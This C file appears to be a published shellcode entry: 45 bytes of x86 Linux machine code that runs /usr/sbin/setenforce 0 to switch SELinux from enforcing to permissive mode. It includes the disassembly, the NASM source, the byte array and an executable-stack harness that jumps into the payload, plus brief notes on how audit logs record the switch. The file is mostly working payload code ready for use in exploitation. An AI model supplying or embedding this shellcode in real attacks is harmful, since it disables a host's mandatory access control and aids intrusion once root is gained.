/*
# Title: x86 SELinux change between permissive and enforcing modes shellcode
# Date: 20-02-2017
# Author: lu0xheap
# Platform: Lin_x86
# Tested on: CentOS 6.8 (i686)
# Shellcode Size: 45 bytes
# ID: SLAE - 871
*/
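/*
1. Description:

SELinux mode switcher. The payload is a single execve of /usr/sbin/setenforce
with a one-character mode argument; that argument is the byte pushed by the
second "push" (opcode 0x6a) in the listing below.
Permissive = "\x30" (ASCII '0'); Enforcing = "\x31" (ASCII '1').

Build the test harness with:
gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
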
2. Disassembly of section .text:

08048060 <_start>:
8048060: 6a 0b push 0xb
8048062: 58 pop eax
8048063: 31 d2 xor edx,edx
8048065: 52 push edx
8048066: 6a 30 push 0x30
8048068: 89 e1 mov ecx,esp
804806a: 52 push edx
804806b: 68 6f 72 63 65 push 0x6563726f
8048070: 68 74 65 6e 66 push 0x666e6574
8048075: 68 6e 2f 73 65 push 0x65732f6e
804807a: 68 2f 73 62 69 push 0x6962732f
804807f: 68 2f 75 73 72 push 0x7273752f
8048084: 89 e3 mov ebx,esp
8048086: 52 push edx
8048087: 51 push ecx
8048088: 53 push ebx
8048089: 89 e1 mov ecx,esp
804808b: cd 80 int 0x80

3. Code

; NASM (Intel syntax), 32-bit Linux, int 0x80 syscall convention:
;   eax = syscall number, ebx / ecx / edx = first three arguments.
; Net effect of the routine:
;   execve("/usr/sbin/setenforce", {"/usr/sbin/setenforce", "0", NULL}, NULL)
; There is no exit path after int 0x80; the code relies on execve replacing
; the process image.
; Defender note: this is an ordinary execve of a fixed path, so process /
; execve auditing sees /usr/sbin/setenforce launched with the argument "0".
global _start
section .text
_start:
push 0xb                ; eax = 0xb via push/pop (execve on i386) ...
pop eax                 ; ... which avoids NUL bytes in the encoding
xor edx, edx            ; edx = 0: used as NUL terminator, NULL pointer and envp
push edx                ; terminator dword above the mode string
push byte 0x30          ; mode string "0" (permissive); 0x31 would be "1" (enforcing)
mov ecx, esp            ; ecx -> mode string (becomes argv[1])
push edx                ; NUL terminator for the path string
push 0x6563726f         ; "orce"
push 0x666e6574         ; "tenf"
push 0x65732f6e         ; "n/se"
push 0x6962732f         ; "/sbi"
push 0x7273752f         ; "/usr"  -> stack now holds "/usr/sbin/setenforce"
mov ebx, esp            ; ebx -> path (execve arg 1, also argv[0])
push edx                ; argv[2] = NULL
push ecx                ; argv[1] -> mode string
push ebx                ; argv[0] -> path
mov ecx, esp            ; ecx -> argv array (execve arg 2); edx = NULL envp (arg 3)
int 0x80                ; invoke the syscall selected by eax
*/
#include<stdio.h>
#include<string.h>
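/*
 * Raw machine code of the _start routine shown in the header comment:
 * 45 bytes of i386 code followed by the string literal's implicit NUL.
 * The payload contains no 0x00 byte, so strlen() reports the full length.
 *
 * The literal is split per instruction so each byte group can be checked
 * against the disassembly. Stray separator lines and a dangling line
 * continuation that made the initializer unparseable have been dropped;
 * the byte sequence itself is unchanged.
 *
 * What it does when executed: execve of /usr/sbin/setenforce with the
 * one-character argument given by the mode byte below.
 *
 * Detection / impact notes: the mode switch only takes effect if the
 * process is already root and policy allows it to set the enforcing state.
 * A successful switch is recorded by the kernel as an audit MAC_STATUS
 * event (enforcing= / old_enforcing= fields), independent of how
 * setenforce was launched, so that record is the reliable place to alert.
 */
unsigned char code[] =
    "\x6a\x0b"                  /* push 0xb                             */
    "\x58"                      /* pop  eax        ; eax = 11 (execve)  */
    "\x31\xd2"                  /* xor  edx, edx   ; edx = 0            */
    "\x52"                      /* push edx        ; string terminator  */
    "\x6a"                      /* push imm8 ...                        */
    "\x30"                      /* ... mode byte: '0' permissive, '1' (\x31) enforcing */
    "\x89\xe1"                  /* mov  ecx, esp   ; -> mode string     */
    "\x52"                      /* push edx        ; path terminator    */
    "\x68" "\x6f\x72\x63\x65"   /* push "orce"                          */
    "\x68" "\x74\x65\x6e\x66"   /* push "tenf"                          */
    "\x68" "\x6e\x2f\x73\x65"   /* push "n/se"                          */
    "\x68" "\x2f\x73\x62\x69"   /* push "/sbi"                          */
    "\x68" "\x2f\x75\x73\x72"   /* push "/usr"                          */
    "\x89\xe3"                  /* mov  ebx, esp   ; -> path            */
    "\x52"                      /* push edx        ; argv[2] = NULL     */
    "\x51"                      /* push ecx        ; argv[1] = mode     */
    "\x53"                      /* push ebx        ; argv[0] = path     */
    "\x89\xe1"                  /* mov  ecx, esp   ; -> argv            */
    "\xcd\x80";                 /* int  0x80                            */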
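/*
 * Test harness: print the payload length, then transfer control into the
 * `code` byte array.
 *
 * Changes from the original listing:
 *   - explicit `int main(void)` and a return value (implicit int is not
 *     valid since C99, and this file already uses C99 mixed declarations);
 *   - strlen() returns size_t, so the length is printed with %zu instead
 *     of %d, and the unsigned char buffer is cast to the char pointer type
 *     strlen() expects.
 *
 * Behaviour notes:
 *   - The call only works if the data segment is executable; presumably
 *     that is what the -z execstack flag in the header's build line is for.
 *   - If the execve inside the payload succeeds, the process image is
 *     replaced and control never comes back here.
 *   - The payload has no exit path of its own: after a failed execve,
 *     execution runs past the end of the array, so the `return 0` below is
 *     not a dependable failure path.
 */
int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the byte array as a function and call it. */
    int (*ret)(void) = (int (*)(void))code;
    ret();

    return 0;
}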